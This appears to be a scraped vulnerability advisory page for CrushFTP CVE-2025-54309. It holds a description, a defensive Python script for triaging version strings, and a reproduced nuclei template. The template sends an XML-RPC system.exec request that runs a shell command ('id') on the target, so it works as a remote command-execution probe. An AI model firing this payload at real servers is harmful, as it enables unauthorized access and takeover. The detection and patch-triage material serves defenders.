CrushFTP - Unprotected Alternate Channel

Vulnerability information

Vulnerability name: CrushFTP - Unprotected Alternate Channel

Vulnerability ID:

  • CVE: CVE-2025-54309

Vulnerability type: Authentication bypass

Severity: Critical

Vulnerability description: CrushFTP is a widely used file transfer server that supports FTP, SFTP, HTTP(S) and other protocols, and is commonly deployed in enterprise environments for file sharing and transfer; it is popular for its feature set and ease of deployment. This vulnerability is a mishandling of AS2 validation when the DMZ proxy feature is not in use, which lets a remote attacker obtain administrator access over HTTPS. The root cause is that the software fails to properly validate requests arriving over an unprotected alternate channel (CWE-420), so an attacker can bypass the normal authentication flow. With administrator access an attacker has full control of the affected CrushFTP server and can execute arbitrary commands, read sensitive data or carry out other malicious actions. Exploitation requires no user interaction and was observed in the wild in July 2025, so it is a serious threat to any organization running an affected version.

Vendor: crushftp

Product: CrushFTP

Affected versions: 10 before 10.8.5 and 11 before 11.3.4_23

Search query: title:"CrushFTP"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/44413668c914b88b2017af296f1c21e6c8366ae8/http%2Fcves%2F2025%2FCVE-2025-54309.yaml

Type: projectdiscovery/nuclei-templates:github issues
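The affected-version ranges above are the first check a defender runs, and the 11.x fix is identified by a build suffix (11.3.4_23), which a naive numeric comparison gets wrong: a plain 11.3.4 with no suffix is still before 11.3.4_23. The following Python is an added example written for this page, not code from CrushFTP or from the nuclei template; the function names parse_crushftp_version, is_vulnerable and triage_banners and the sample banner strings are constructed for illustration. It treats a missing build number as build 0 and returns None for version lines this advisory does not cover (the page lists only 10.x and 11.x). Whether the DMZ proxy is in use is a deployment fact the version string cannot tell you, so a "vulnerable" verdict means "patch now", not "confirmed exposed".

```python
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, build)

# First fixed build per major line, as stated on this page:
# 10.x before 10.8.5 and 11.x before 11.3.4_23 are affected.
FIRST_FIXED: Dict[int, Version] = {
    10: (10, 8, 5, 0),
    11: (11, 3, 4, 23),
}

# CrushFTP version token: major.minor.patch with an optional _build suffix.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:_(\d+))?")


def parse_crushftp_version(text: str) -> Optional[Version]:
    """Extract the first 'major.minor.patch[_build]' token from text.

    A missing '_build' suffix is treated as build 0, so '11.3.4' sorts
    before '11.3.4_23'. Returns None when no version token is present.
    """
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, patch, build = m.groups()
    return (int(major), int(minor), int(patch), int(build or 0))


def is_vulnerable(text: str) -> Optional[bool]:
    """True/False against FIRST_FIXED; None if the text has no version
    or its major line is not one this advisory covers (only 10 and 11)."""
    v = parse_crushftp_version(text)
    if v is None:
        return None
    fixed = FIRST_FIXED.get(v[0])
    if fixed is None:
        return None
    # Tuple comparison orders by major, minor, patch, then build.
    return v < fixed


def triage_banners(banners: List[str]) -> Dict[str, str]:
    """Map each banner string to 'vulnerable', 'fixed' or 'unknown'."""
    labels = {True: "vulnerable", False: "fixed", None: "unknown"}
    return {b: labels[is_vulnerable(b)] for b in banners}


if __name__ == "__main__":
    # Constructed sample banners (hypothetical, not real hosts).
    sample = [
        "CrushFTP 10.8.4",
        "CrushFTP 10.8.5",
        "CrushFTP 11.3.4",
        "CrushFTP 11.3.4_22",
        "CrushFTP 11.3.4_23",
        "CrushFTP 11.3.5_1",
        "CrushFTP 9.5.0",
        "nginx",
    ]
    for banner, verdict in triage_banners(sample).items():
        print(f"{banner:22s} {verdict}")
```

Feed it whatever version strings your inventory or a Shodan export gives you; the "unknown" bucket is worth a manual look, since it collects both non-CrushFTP banners and version lines the advisory says nothing about.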

PoC details

The nuclei template below is reproduced as the page carries it. Note that the request it sends (an XML-RPC system.exec call to /WebInterface/function/) does not exercise the AS2 validation path the description names, and the type field above records the template as coming from a GitHub issue rather than a released template, so treat a match as something to confirm against the vendor's compromise guidance rather than as a confirmed detection.

id: CVE-2025-54309

info:
  name: CrushFTP - Unprotected Alternate Channel
  author: anshubind
  severity: critical
  description: |
    CrushFTP 10 before 10.8.5 and 11 before 11.3.4_23, when the DMZ proxy feature is not used, mishandles AS2 validation and consequently allows remote attackers to obtain admin access via HTTPS, as exploited in the wild in July 2025.
  impact: |
    Remote attackers can gain administrative access, leading to full control over the CrushFTP server.
  remediation: |
    Update to version 10.8.5, 11.3.4_23 or later.
  reference:
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=CompromiseJuly2025
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54309
    - https://github.com/advisories/GHSA-rh5q-v9ww-rqgm
    - https://github.com/issamjr/CVE-2025-54309-EXPLOIT
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.0
    cve-id: CVE-2025-54309
    cwe-id: CWE-420
    epss-score: 0.07464
    epss-percentile: 0.91328
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: crushftp
    product: crushftp
    shodan-query: title:"CrushFTP"
  tags: cve,cve2025,crushftp,rce

variables:
  cmd: "id"

http:
  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/"

    headers:
      Content-Type: application/xml

    body: |
      <?xml version="1.0"?>
      <methodCall>
        <methodName>system.exec</methodName>
        <params>
          <param>
            <value>
              <string>{{cmd}}</string>
            </value>
          </param>
        </params>
      </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "uid="

      - type: status
        status:
          - 200


http://example.com/2025/07/29/github_4037175452/
Author
lianccc
Published
July 29, 2025
License